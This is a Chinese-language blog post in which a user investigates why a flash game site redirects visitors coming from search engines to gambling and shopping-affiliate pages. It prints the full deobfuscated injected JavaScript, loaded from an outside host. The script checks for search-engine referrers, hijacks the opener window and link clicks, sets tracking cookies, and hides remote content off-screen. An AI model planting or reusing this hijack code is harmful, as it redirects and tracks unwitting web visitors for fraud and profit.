昨天晚上打开flash.07073.com的时候会跳到一个博彩的网站。开始的时候并没在意,小游戏网广告多也算正常吧。后来发现只要是从Google搜索结果点过来链接全部都会跳到这个博彩网站,偶尔还会跳到天猫、paipai、一号店,都是推广链接。
我开始还以为是Chrome又安装了恶意插件,检查一番确定不是浏览器问题,也不会是木马。难道是搜索页面劫持?
查看网站源码,在 /images/images.js 发现了referrer代码。
这段代码很快就被删除了。但是我的浏览器从搜索引擎过去还会跳转到其他网站。继续找:
这里调用s.tkurl.com上的js:
s.tkurl.com/navigatoral.js 使用eval的方式加密了javascript代码:
解密后:
if ("undefined" == typeof(_5had0w)) {
_5had0w = [];
_5had0w.ssite = new RegExp("(www.baidu.com)|(www.google.c)|(www.youdao.com)|(search.cn.yahoo.com)|(search.yahoo.com)|(114search.118114.cn)|(bing.118114.cn)|(search.114.vnet.cn)|(bing.com)|(soso.com)|(sososnap.com)|(sogou.com)|(so.360.cn)|(hao.360.cn)|(www.so.com)|(360webcache.com)|(gougou.com)|(www.gouwo.com)|(cache.baidu.com)|(m.baidu.com)|(baike.baidu.com)|(tieba.baidu.com)|(qzone.qq.com)|(t.qq.com)|(baidu.asp)|(hao123.com)|(265.com)|(114la.com)|(115.com)|(etao.com)", "i");
_5had0w.win = window;
try {
if (parent && parent.f && parent.document.getElementById("fulliframe")) {
_5had0w.win = parent
}
} catch(e) {}
_5had0w.host = _5had0w.win.location.host;
if (!_5had0w.host) _5had0w.host = "";
_5had0w.getcookie = function(sName) {
var aCookie = document.cookie.split("; ");
for (var i = 0; i < aCookie.length; i++) {
var aCrumb = aCookie[i].split("=");
if (sName == aCrumb[0]) return unescape(aCrumb[1])
}
return ""
};
_5had0w.setcookie = function(sValue) {
date = new Date();
date.setMinutes(date.getMinutes() + 6);
document.cookie = "oc_busy=" + escape(sValue) + "; expires=" + date.toGMTString() + ";path=/"
};
_5had0w.hcode = _5had0w.host.replace(/(www|blog|bbs)\./ig, "").charCodeAt(0);
if (isNaN(_5had0w.hcode)) _5had0w.hcode = 0;
_5had0w.mall = "htt" + "p://s.t" + "kur" + "l.c" + "om/gom" + "alls.ht" + "ml?";
_5had0w.dd = new Date();
_5had0w.powerboom = function() {
try {
var urlp = _5had0w.mall + "p0" + (_5had0w.dd.getMonth() + 1) + "" + _5had0w.dd.getDate() + ".html";
if (document.attachEvent) {
_5had0w.pnode.launchURL(urlp);
_5had0w.pnode = null;
self.focus()
}
} catch(e) {}
};
_5had0w.nvPower = function() {
try {
if (document.attachEvent) {
_5had0w.pnode = document.createElement("");
window.attachEvent("onunload", _5had0w.powerboom)
}
} catch(e) {}
};
_5had0w.detachPower = function() {
try {
if (window.detachEvent) {
_5had0w.pnode = null;
window.detachEvent("onunload", _5had0w.powerboom)
}
} catch(e) {}
};
_5had0w.nvEnter = function() {
_5had0w.detachPower();
_5had0w.setcookie("_mall");
_5had0w.win.location = _5had0w.mall + "e0" + (_5had0w.dd.getMonth() + 1) + "" + _5had0w.dd.getDate() + ".html"
};
_5had0w.shadowClick = function() {
setTimeout(_5had0w.nvEnter, 1500);
return true
};
_5had0w.np = false;
_5had0w.nvIt = function(lochref) {
try {
_5had0w.win.opener.location = lochref
} catch(e) {
try {
_5had0w.win.opener.navigate(lochref)
} catch(e2) {
try {
_5had0w.win.opener.opener.navigate(lochref)
} catch(e3) {
_5had0w.nvPower();
_5had0w.np = true
}
}
}
};
_5had0w.nvUrl = function() {
var _co = _5had0w.getcookie("oc_busy");
if (_co == "" || _co.indexOf("mall") < 0) {
_5had0w.nvIt(_5had0w.mall + "n0" + (_5had0w.dd.getMonth() + 1) + "" + _5had0w.dd.getDate() + ".html");
if (!_5had0w.np) {
_5had0w.setcookie(_co + "_mall")
}
}
};
if (_5had0w.win.opener) {
if (_5had0w.ssite.test(_5had0w.win.document.referrer)) {
_5had0w.nvUrl()
}
}
_5had0w.appendChild = function(html) {
var node = document.createElement("DIV");
node.style.width = "0";
node.style.height = "0";
node.style.position = "absolute";
node.style.left = "-100px";
node.innerHTML = html;
document.body.appendChild(node)
};
_5had0w.appendScript = function() {
if (1 > arguments.length) return;
var node = document.createElement("DIV");
node.style.width = "0";
node.style.height = "0";
node.style.position = "absolute";
node.style.left = "-100px";
for (var i = 0; i < arguments.length; i++) node.appendChild(document.createElement('script')).src = arguments[i];
document.body.appendChild(node)
};
_5had0w.oload = function() {
if (document.body == null) {
setTimeout(_5had0w.oload, 200)
} else {
var fp = "htt" + "p://s.t" + "kur" + "l.c" + "om/bro" + "adp.s" + "wf";
var pm = "d=" + _5had0w.host.replace(/(www|blog|bbs)\./ig, "").charAt(0);
try {
if ((!document.attachEvent) || navigator.userAgent.indexOf("Opera") > -1) {
pm += "&b=ff"
}
} catch(e) {}
var str = '';
_5had0w.appendChild(str);
if (_5had0w.np) {
var ls = document.links;
if (ls.length && ls.length > 0) {
for (var i = 0; i < ls.length; i++) {
if (ls[i].href.indexOf("javascript") < 0) {
ls[i].target = "_blank";
ls[i].onclick = _5had0w.shadowClick
}
}
}
}
}
};
try {
if (document.attachEvent) {
window.attachEvent("onload", _5had0w.oload)
} else {
window.addEventListener("load", _5had0w.oload, false)
}
} catch(e) {}
}
没必要故意这么做吧?
本文结束。
Leave a comment